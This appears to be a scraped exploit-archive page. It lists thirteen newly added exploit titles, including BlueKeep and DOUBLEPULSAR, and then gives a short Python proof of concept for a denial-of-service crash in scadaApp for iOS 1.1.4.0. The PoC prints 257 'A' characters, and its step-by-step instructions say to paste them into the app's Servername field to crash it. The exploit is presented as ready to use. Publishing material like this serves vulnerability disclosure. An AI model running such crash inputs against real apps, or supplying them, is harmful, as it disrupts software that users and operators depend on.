72cddaee51
13 changes to exploits/shellcodes ipPulse 1.92 - 'Enter Key' Denial of Service (PoC) Centova Cast 3.2.12 - Denial of Service (PoC) scadaApp for iOS 1.1.4.0 - 'Servername' Denial of Service (PoC) XMedia Recode 3.4.8.6 - '.m3u' Denial Of Service BartVPN 1.2.2 - 'BartVPNService' Unquoted Service Path Studio 5000 Logix Designer 30.01.00 - 'FactoryTalk Activation Service' Unquoted Service Path Microsoft Windows 10 Build 1803 < 1903 - 'COMahawk' Local Privilege Escalation DOUBLEPULSAR (x64) - Hooking 'srv!SrvTransactionNotImplemented' in 'srv!SrvTransaction2DispatchTable' Microsoft Windows 7 (x86) - 'BlueKeep' Remote Desktop Protocol (RDP) Remote Windows Kernel Use After Free Cisco Prime Infrastructure Health Monitor HA TarArchive - Directory Traversal / Remote Code Execution Apache Httpd mod_proxy - Error Page Cross-Site Scripting Apache Httpd mod_rewrite - Open Redirects WordPress Core < 5.2.3 - Viewing Unauthenticated/Password/Private Posts
24 lines
No EOL
720 B
Python
Executable file
24 lines
No EOL
720 B
Python
Executable file
# Exploit Title: scadaApp for iOS 1.1.4.0 - 'Servername' Denial of Service (PoC)
|
|
# Discovery by: Luis Martinez
|
|
# Discovery Date: 2019-11-18
|
|
# Vendor Homepage: https://apps.apple.com/ca/app/scadaapp/id1206266634
|
|
# Software Link: App Store for iOS devices
|
|
# Tested Version: 1.1.4.0
|
|
# Vulnerability Type: Denial of Service (DoS) Local
|
|
# Tested on OS: iPhone 7 iOS 13.2
|
|
|
|
# Steps to Produce the Crash:
|
|
# 1.- Run python code: scadaApp_for_iOS_1.1.4.0.py
|
|
# 2.- Copy content to clipboard
|
|
# 3.- Open "scadaApp for iOS"
|
|
# 4.- Let's go
|
|
# 5.- Username > "l4m5"
|
|
# 6.- Password > "l4m5"
|
|
# 7.- Paste ClipBoard on "Servername"
|
|
# 8.- Login
|
|
# 9.- Crashed
|
|
|
|
#!/usr/bin/env python
|
|
|
|
buffer = "\x41" * 257
|
|
print (buffer) |